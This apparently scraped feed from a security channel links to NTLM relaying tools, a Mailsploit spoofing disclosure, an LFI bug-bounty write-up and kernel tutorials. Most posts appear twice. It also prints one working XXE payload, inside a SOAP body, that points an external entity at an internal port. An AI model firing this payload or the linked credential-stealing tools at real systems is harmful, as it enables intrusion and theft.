Canadian hacker behind 500M Yahoo hack reveals Russian connection
https://www.hackread.com/canadian-hacker-behind-500m-yahoo-hack-reveals-russian-connection%e2%80%8b/
https://www.hackread.com/canadian-hacker-behind-500m-yahoo-hack-reveals-russian-connection%e2%80%8b/
Hackread - Latest Cybersecurity, Tech, Crypto & Hacking News
Canadian hacker behind 500M Yahoo hack reveals Russian connection
In 2014, Yahoo announced that it had suffered a massive data breach in which 500 million user accounts containing emails and passwords were stolen. The
NTLM Relaying Attack in 2017
1 - You get NT hash with Mimikatz [https://github.com/gentilkiwi/mimikatz]
2 - You get Net-NTLM in modern windows environments with Responder [https://github.com/lgandx/Responder] or Inveigh [https://github.com/Kevin-Robertson/Inveigh].
[*] This article is going to be talking about what you can do with Net-NTLM in modern windows environments.
https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html
Video : https://www.youtube.com/embed/f9oMVoc2Umc
1 - You get NT hash with Mimikatz [https://github.com/gentilkiwi/mimikatz]
2 - You get Net-NTLM in modern windows environments with Responder [https://github.com/lgandx/Responder] or Inveigh [https://github.com/Kevin-Robertson/Inveigh].
[*] This article is going to be talking about what you can do with Net-NTLM in modern windows environments.
https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html
Video : https://www.youtube.com/embed/f9oMVoc2Umc
GitHub
GitHub - gentilkiwi/mimikatz: A little tool to play with Windows security
A little tool to play with Windows security. Contribute to gentilkiwi/mimikatz development by creating an account on GitHub.
Socket Data Transfer With RSA Encryption
https://github.com/raminfp/socket_rsa_python
TODO:
- Multi-Client
- C&C
- Simple Malware for send agents
- Reverse shell
https://github.com/raminfp/socket_rsa_python
TODO:
- Multi-Client
- C&C
- Simple Malware for send agents
- Reverse shell
GitHub
GitHub - raminfp/socket_rsa_python
Contribute to raminfp/socket_rsa_python development by creating an account on GitHub.
Writing a Simple Linux Kernel Module – Sourcerer Blog
https://blog.sourcerer.io/writing-a-simple-linux-kernel-module-d9dc3762c234
https://blog.sourcerer.io/writing-a-simple-linux-kernel-module-d9dc3762c234
Medium
Writing a Simple Linux Kernel Module
Grabbing the Golden Ring-0
#Qubes_Core
Qubes OS A reasonably secure operating system ( https://www.qubes-os.org/ )
Founder : https://en.wikipedia.org/wiki/Joanna_Rutkowska
Download : https://www.qubes-os.org/downloads/
Qubes OS A reasonably secure operating system ( https://www.qubes-os.org/ )
Founder : https://en.wikipedia.org/wiki/Joanna_Rutkowska
Download : https://www.qubes-os.org/downloads/
HackerOne
#Qubes_Core Qubes OS A reasonably secure operating system ( https://www.qubes-os.org/ ) Founder : https://en.wikipedia.org/wiki/Joanna_Rutkowska Download : https://www.qubes-os.org/downloads/
Qubes OS is a project, Qubes support Linux multi-process applications. Comparable to virtual machines, (eg : Graphene runs applications in an isolated environment (QVM)),
We can see "Graphene Library OS" [https://github.com/oscarlab/graphene] can support running Linux applications with the latest Intel SGX (Software Guard Extension) in secure hardware and diffrent memory regions,
We have different application environment with multi-tasking in the virtual machines in user-space with Qubes OS,
We can see "Graphene Library OS" [https://github.com/oscarlab/graphene] can support running Linux applications with the latest Intel SGX (Software Guard Extension) in secure hardware and diffrent memory regions,
We have different application environment with multi-tasking in the virtual machines in user-space with Qubes OS,
GitHub
GitHub - oscarlab/graphene: Graphene / Graphene-SGX - a library OS for Linux multi-process applications, with Intel SGX support
Graphene / Graphene-SGX - a library OS for Linux multi-process applications, with Intel SGX support - GitHub - oscarlab/graphene: Graphene / Graphene-SGX - a library OS for Linux multi-process appl...
XXE inside a SOAP node:
<soap:Body><foo><![CDATA[<!DOCTYPE doc [<!ENTITY % dtd SYSTEM "http://0x0:22/"> %dtd;]><xxx/>]]></foo></soap:Body>
<soap:Body><foo><![CDATA[<!DOCTYPE doc [<!ENTITY % dtd SYSTEM "http://0x0:22/"> %dtd;]><xxx/>]]></foo></soap:Body>
DebugFS tutorial from a Linux kernel because this is very useful for kernel programming
https://github.com/chadversary/debugfs-tutorial
https://github.com/chadversary/debugfs-tutorial
GitHub
chadversary/debugfs-tutorial
a tiny tutorial on how to use debugfs from a Linux kernel module - chadversary/debugfs-tutorial
Intersting Bug!!!
https://medium.com/@maxon3/lfi-to-command-execution-deutche-telekom-bug-bounty-6fe0de7df7a6
https://medium.com/@maxon3/lfi-to-command-execution-deutche-telekom-bug-bounty-6fe0de7df7a6
Medium
LFI to Command Execution: Deutche Telekom Bug Bounty
Few months ago I did a little subdomain bruteforce on telekom.de , to see if there are new subdomains which, if I’m luck enough, could have…
Abusing RFC-1342 to spoof email addresses vulnerability, Most mail clients are vunerable,
Vendors affected by Mailsploit (https://www.mailsploit.com/index) :
https://docs.google.com/spreadsheets/d/1jkb_ZybbAoUA43K902lL-sB7c1HMQ78-fhQ8nowJCQk/edit#gid=0
PoC:
https://www.youtube.com/embed/gfAGOMeiXNI
Vendors affected by Mailsploit (https://www.mailsploit.com/index) :
https://docs.google.com/spreadsheets/d/1jkb_ZybbAoUA43K902lL-sB7c1HMQ78-fhQ8nowJCQk/edit#gid=0
PoC:
https://www.youtube.com/embed/gfAGOMeiXNI
Today free book is out!
Expert Python Programming - Second Edition
https://www.packtpub.com/packt/offers/free-learning
Expert Python Programming - Second Edition
https://www.packtpub.com/packt/offers/free-learning